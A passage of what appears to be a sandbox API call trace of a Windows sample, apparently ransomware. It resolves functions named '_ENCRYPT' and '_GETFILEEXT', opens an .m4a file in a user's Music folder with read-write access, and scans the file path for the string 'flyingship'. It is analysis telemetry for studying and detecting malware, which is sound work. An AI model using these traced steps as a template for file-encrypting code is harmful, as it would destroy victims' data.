(HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0184.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0184.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd6f0 [0184.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd6f0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0184.172] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\k4co 93mbgwb3udhm.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0184.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0184.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0184.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0184.172] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0184.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0184.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0184.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0184.173] FreeLibrary (hLibModule=0x75990000) returned 1 [0184.173] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0184.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0184.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0184.173] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0184.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0184.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0184.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0184.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0184.173] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0184.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0184.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0184.173] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0184.174] FreeLibrary (hLibModule=0x75990000) returned 1 [0184.174] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0184.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0184.174] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0184.174] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0184.174] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.174] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0184.174] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0184.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0184.174] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0184.174] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.174] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.174] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.174] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x822c4ab0, ftCreationTime.dwHighDateTime=0x1d5dcc0, ftLastAccessTime.dwLowDateTime=0x45537f10, ftLastAccessTime.dwHighDateTime=0x1d5e179, ftLastWriteTime.dwLowDateTime=0x45537f10, ftLastWriteTime.dwHighDateTime=0x1d5e179, nFileSizeHigh=0x0, nFileSizeLow=0x64c5, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="K4cO 93Mbgwb3udHm.m4a", cAlternateFileName="K4CO93~1.M4A")) returned 0x90add8 [0184.176] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0184.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0184.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0184.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0184.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0184.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0184.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0184.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0184.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0184.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0184.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0184.177] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.177] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x822c4ab0, ftCreationTime.dwHighDateTime=0x1d5dcc0, ftLastAccessTime.dwLowDateTime=0x45537f10, ftLastAccessTime.dwHighDateTime=0x1d5e179, ftLastWriteTime.dwLowDateTime=0x45537f10, ftLastWriteTime.dwHighDateTime=0x1d5e179, nFileSizeHigh=0x0, nFileSizeLow=0x64c5, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="K4cO 93Mbgwb3udHm.m4a", cAlternateFileName="K4CO93~1.M4A")) returned 0x90add8 [0184.177] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0184.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0184.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0184.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0184.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0184.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0184.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0184.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0184.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0184.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0184.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0184.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0184.178] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0184.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0184.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0184.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0184.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0184.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.178] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.179] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fgMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gMpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MpL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pL3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.180] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0184.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.181] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aJ1lagIQtz\\K4cO 93Mbgwb3udHm.m4a\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0184.181] 